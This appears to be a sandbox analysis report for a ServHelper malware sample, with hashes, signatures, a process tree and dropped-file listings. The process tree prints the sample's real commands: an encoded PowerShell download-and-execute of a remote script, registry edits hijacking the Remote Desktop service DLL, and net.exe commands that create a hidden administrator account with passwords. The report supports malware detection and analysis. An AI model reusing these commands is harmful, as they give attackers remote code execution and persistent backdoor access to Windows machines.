Analysis

  • max time kernel
    147s
  • max time network
    134s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    29-09-2021 15:40

General

  • Target

    74f029d2fd587f9e25091f7832bea2f2.exe

  • Size

    5.7MB

  • MD5

    74f029d2fd587f9e25091f7832bea2f2

  • SHA1

    76fb2d051d6dc938ba2b7131ef1b21c0fe2ad60c

  • SHA256

    5f0c0223d10468b9130a240432342f4056c6d7c2f6f89469c9d971bcea31255a

  • SHA512

    0386c61a89b414ab50c2c7b371d2bab288bde154da35c643de423622b05e99fcc748f5b0b9e53f8da00e6dccd02cf535b6d41c15fbddfa732a599db3bac45a23

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • suricata: ET MALWARE ServHelper CnC Inital Checkin

    suricata: ET MALWARE ServHelper CnC Inital Checkin

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\74f029d2fd587f9e25091f7832bea2f2.exe
    "C:\Users\Admin\AppData\Local\Temp\74f029d2fd587f9e25091f7832bea2f2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1404
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2336
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\haftagsk\haftagsk.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1444
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9FC5.tmp" "c:\Users\Admin\AppData\Local\Temp\haftagsk\CSC7EDA78EA8A094F018439CB9964965DA0.TMP"
          4⤵
            PID:4092
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3180
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3612
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1128
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:2764
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:3876
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:4084
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3620
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:3556
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3596
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1228
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3604
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:3980
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3016
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3296
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4084
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:1292
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:4736
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:4752
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user wgautilacc Ghar4f5 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1264
                    • C:\Windows\system32\net.exe
                      net.exe user wgautilacc Ghar4f5 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:796
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                        3⤵
                          PID:804
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user wgautilacc EdrwL8Uu /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4036
                      • C:\Windows\system32\net.exe
                        net.exe user wgautilacc EdrwL8Uu /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3180
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user wgautilacc EdrwL8Uu /add
                          3⤵
                            PID:1248
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3252
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3556
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                            3⤵
                              PID:1792
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3604
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3612
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                              3⤵
                                PID:920
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:796
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1792
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                3⤵
                                  PID:3344
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user wgautilacc EdrwL8Uu
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2356
                              • C:\Windows\system32\net.exe
                                net.exe user wgautilacc EdrwL8Uu
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:920
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user wgautilacc EdrwL8Uu
                                  3⤵
                                    PID:1384
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3252
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic path win32_VideoController get name
                                  2⤵
                                  • Modifies data under HKEY_USERS
                                  PID:3924
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic CPU get NAME
                                1⤵
                                  PID:2356
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic CPU get NAME
                                    2⤵
                                      PID:3604
                                  • C:\Windows\System32\cmd.exe
                                    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                    1⤵
                                      PID:1792
                                      • C:\Windows\system32\cmd.exe
                                        cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                        2⤵
                                          PID:1248
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                            3⤵
                                            • Blocklisted process makes network request
                                            • Drops file in Program Files directory
                                            • Drops file in Windows directory
                                            • Modifies data under HKEY_USERS
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:1256
                                      • C:\Windows\System32\cmd.exe
                                        cmd.exe /C net user wgautilacc 1234
                                        1⤵
                                          PID:4512
                                          • C:\Windows\system32\net.exe
                                            net user wgautilacc 1234
                                            2⤵
                                              PID:4552
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 user wgautilacc 1234
                                                3⤵
                                                  PID:4572

                                            Network

                                            MITRE ATT&CK Enterprise v6

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Users\Admin\AppData\Local\Temp\RES9FC5.tmp

                                              MD5

                                              3fc8b4f6b1f242af7cdb0fc51a6d692f

                                              SHA1

                                              1ca8ae7b7d06722ae8eebf7433957c6101544886

                                              SHA256

                                              2c8e5ee3fde5d5835d807940007990aa3a31e9ceb8cee59047f5ab9df53cfd74

                                              SHA512

                                              d2f7c0df3ceadf708849528bf23183b50fa052595b2b8d952a64be0733a8fe2c12efe73b07fae7b85f63122ec8f7c5987462e4abb6465387124dbe09a9df1d40

                                            • C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

                                              MD5

                                              1ef6eef1d39c71661339d818226d688d

                                              SHA1

                                              b3e44163a9d9894d091f59f888d7d5d90e68e216

                                              SHA256

                                              dcad3e3226ea222782284a604f9354ac661cf6e34c26c62162dd1aeedfbef04a

                                              SHA512

                                              8deb2b6df79c2ce81604b9124d92c6222f517cea021416513fdd8dfc9f8d46ae464cd69f50ee70a343cfe5b4fbc4d08212bcf3e1416262193cae52b4a30b2c49

                                            • C:\Users\Admin\AppData\Local\Temp\haftagsk\haftagsk.dll

                                              MD5

                                              ea221853831e01a9189509e963b88ba0

                                              SHA1

                                              2dfc848f7b0ec9760412ed40e5133cb59bc011d5

                                              SHA256

                                              c5f3667f652f85bfdeae8b628f27763d84886eef99eb97d38021757e4a092905

                                              SHA512

                                              a2ec0b074d5d1a999a5e15288eaed06137dde09031dbcb6fd1ff37dece842ca9c3087384133b8c4d5606cb702496402a339269b2e1332bedcee36a8400503f3b

                                            • C:\Users\Admin\AppData\Local\Temp\ready.ps1

                                              MD5

                                              28d9755addec05c0b24cca50dfe3a92b

                                              SHA1

                                              7d3156f11c7a7fb60d29809caf93101de2681aa3

                                              SHA256

                                              abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

                                              SHA512

                                              891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

                                            • \??\c:\Users\Admin\AppData\Local\Temp\haftagsk\CSC7EDA78EA8A094F018439CB9964965DA0.TMP

                                              MD5

                                              83a173563050acb2c4bf93708c9f1ff5

                                              SHA1

                                              136c858ad17649457de043d6c4204d0aa76fd5e0

                                              SHA256

                                              81f4c36cc17d054f5d0ba299f968637bb2222f0b8d66fd28693f8355c158f2a1

                                              SHA512

                                              c8a30c871397a35d6e95d6154cea0293b1ec083d8b5b46c483fcc1c52695da11b5190a33d060cd4be67532aeaae8f4416f644ba330cc40c563ea74089c2dfc3d

                                            • \??\c:\Users\Admin\AppData\Local\Temp\haftagsk\haftagsk.0.cs

                                              MD5

                                              9f8ab7eb0ab21443a2fe06dab341510e

                                              SHA1

                                              2b88b3116a79e48bab7114e18c9b9674e8a52165

                                              SHA256

                                              e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

                                              SHA512

                                              53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

                                            • \??\c:\Users\Admin\AppData\Local\Temp\haftagsk\haftagsk.cmdline

                                              MD5

                                              4440fbe9cce70baec4cf0991d692293d

                                              SHA1

                                              0a67ac11fdbe4deb2902a1f11b12415df6b5fd77

                                              SHA256

                                              214abb69603154debc34b36abef5011e3a51d6ed2f03d3830a0a410ba8a7d745

                                              SHA512

                                              6e36f1ff6b25cc1cd9bdf01abd64e32cc02968c73b23d1316d3b0f70127155527295a8e7e4cdc34496637d078ea13256738967528a6dbdb03c70afc4daa707bb

                                            • \Windows\Branding\mediasrv.png

                                              MD5

                                              44161e115bf968d5b616d254be2f38a1

                                              SHA1

                                              b801a9318b1fc89996f76055c69e071e0fed368a

                                              SHA256

                                              2750122708b726eb5e75869401dc6f3b663e8ca342924f8a713adfca86e80491

                                              SHA512

                                              375ab2fd36f9953faef09e10889535a0e8a5192c841d941998ff0f193d5b6702a26698149789f77925689c74edecb97a78382c2d2529c6ab10a47b723d3a185e

                                            • \Windows\Branding\mediasvc.png

                                              MD5

                                              7245ed7533b89d29f7f5bb35830d4560

                                              SHA1

                                              8efaef0babf855989e460451803032940ae0c7bd

                                              SHA256

                                              89549afa855d70f7bf33b1979541ab0e732c7cc16adb866efffe9d1e8be62638

                                              SHA512

                                              f19a1a72684cc54757d065133dd95122acce69744267fa49a55a5508263946953ad8bca4e2e3188e02a119948dac95a63c185d92c57f32dad51bfaa077a216f3

                                            • memory/796-363-0x0000000000000000-mapping.dmp

                                            • memory/804-364-0x0000000000000000-mapping.dmp

                                            • memory/920-370-0x0000000000000000-mapping.dmp

                                            • memory/920-373-0x0000000000000000-mapping.dmp

                                            • memory/1128-294-0x000001C1CD2C8000-0x000001C1CD2CA000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/1128-292-0x000001C1CD2C3000-0x000001C1CD2C5000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/1128-249-0x0000000000000000-mapping.dmp

                                            • memory/1128-291-0x000001C1CD2C0000-0x000001C1CD2C2000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/1128-293-0x000001C1CD2C6000-0x000001C1CD2C8000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/1228-354-0x0000000000000000-mapping.dmp

                                            • memory/1248-366-0x0000000000000000-mapping.dmp

                                            • memory/1248-377-0x0000000000000000-mapping.dmp

                                            • memory/1256-393-0x0000017435193000-0x0000017435195000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/1256-392-0x0000017435190000-0x0000017435192000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/1256-396-0x0000017435196000-0x0000017435198000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/1256-378-0x0000000000000000-mapping.dmp

                                            • memory/1256-447-0x0000017435198000-0x0000017435199000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1292-360-0x0000000000000000-mapping.dmp

                                            • memory/1384-374-0x0000000000000000-mapping.dmp

                                            • memory/1404-119-0x0000026279986000-0x0000026279987000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1404-114-0x000002627A680000-0x000002627AA7F000-memory.dmp

                                              Filesize

                                              4.0MB

                                            • memory/1404-117-0x0000026279983000-0x0000026279985000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/1404-118-0x0000026279985000-0x0000026279986000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/1404-116-0x0000026279980000-0x0000026279982000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/1444-140-0x0000000000000000-mapping.dmp

                                            • memory/1792-371-0x0000000000000000-mapping.dmp

                                            • memory/1792-368-0x0000000000000000-mapping.dmp

                                            • memory/2336-155-0x000002AE3C110000-0x000002AE3C111000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2336-153-0x000002AE397B8000-0x000002AE397B9000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2336-138-0x000002AE397B3000-0x000002AE397B5000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/2336-120-0x0000000000000000-mapping.dmp

                                            • memory/2336-154-0x000002AE3BD80000-0x000002AE3BD81000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2336-126-0x000002AE3B790000-0x000002AE3B791000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2336-147-0x000002AE215F0000-0x000002AE215F1000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2336-139-0x000002AE397B6000-0x000002AE397B8000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/2336-137-0x000002AE397B0000-0x000002AE397B2000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/2336-131-0x000002AE3B940000-0x000002AE3B941000-memory.dmp

                                              Filesize

                                              4KB

                                            • memory/2764-310-0x0000000000000000-mapping.dmp

                                            • memory/3016-357-0x0000000000000000-mapping.dmp

                                            • memory/3180-365-0x0000000000000000-mapping.dmp

                                            • memory/3180-162-0x0000000000000000-mapping.dmp

                                            • memory/3180-198-0x0000027951D66000-0x0000027951D68000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/3180-174-0x0000027951D60000-0x0000027951D62000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/3180-203-0x0000027951D68000-0x0000027951D6A000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/3180-175-0x0000027951D63000-0x0000027951D65000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/3296-358-0x0000000000000000-mapping.dmp

                                            • memory/3344-372-0x0000000000000000-mapping.dmp

                                            • memory/3556-367-0x0000000000000000-mapping.dmp

                                            • memory/3556-350-0x0000000000000000-mapping.dmp

                                            • memory/3596-353-0x0000000000000000-mapping.dmp

                                            • memory/3604-355-0x0000000000000000-mapping.dmp

                                            • memory/3604-376-0x0000000000000000-mapping.dmp

                                            • memory/3612-209-0x0000000000000000-mapping.dmp

                                            • memory/3612-252-0x000001F0A2F26000-0x000001F0A2F28000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/3612-369-0x0000000000000000-mapping.dmp

                                            • memory/3612-221-0x000001F0A2F20000-0x000001F0A2F22000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/3612-254-0x000001F0A2F28000-0x000001F0A2F2A000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/3612-222-0x000001F0A2F23000-0x000001F0A2F25000-memory.dmp

                                              Filesize

                                              8KB

                                            • memory/3620-349-0x0000000000000000-mapping.dmp

                                            • memory/3876-311-0x0000000000000000-mapping.dmp

                                            • memory/3924-375-0x0000000000000000-mapping.dmp

                                            • memory/3980-356-0x0000000000000000-mapping.dmp

                                            • memory/4084-359-0x0000000000000000-mapping.dmp

                                            • memory/4084-312-0x0000000000000000-mapping.dmp

                                            • memory/4092-143-0x0000000000000000-mapping.dmp

                                            • memory/4552-448-0x0000000000000000-mapping.dmp

                                            • memory/4572-449-0x0000000000000000-mapping.dmp

                                            • memory/4736-462-0x0000000000000000-mapping.dmp

                                            • memory/4752-463-0x0000000000000000-mapping.dmp